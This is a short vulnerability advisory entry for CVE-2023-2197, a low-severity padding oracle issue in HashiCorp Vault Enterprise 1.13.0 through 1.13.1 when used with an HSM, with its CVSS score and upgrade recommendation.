PT-2023-18357 · Hashicorp · Hashicorp Vault Enterprise
Published
2023-05-01
·
Updated
2025-01-30
·
CVE-2023-2197
CVSS v3.1
2.5
Low
| Vector | AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N |
Name of the Vulnerable Software and Affected Versions
HashiCorp Vault Enterprise versions 1.13.0 through 1.13.1
Description
The issue concerns a padding oracle attack when using an HSM in conjunction with the CKM AES CBC PAD or CKM AES CBC encryption mechanisms. An attacker with privileges to modify storage and restart Vault may be able to intercept or modify cipher text in order to derive Vault’s root key.
Recommendations
For HashiCorp Vault Enterprise versions 1.13.0 through 1.13.1, update to version 1.13.2 to resolve the issue. As a temporary workaround, consider restricting access to the HSM and limiting privileges to modify storage and restart Vault until the update is applied.
Fix
Inadequate Encryption Strength
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Hashicorp Vault Enterprise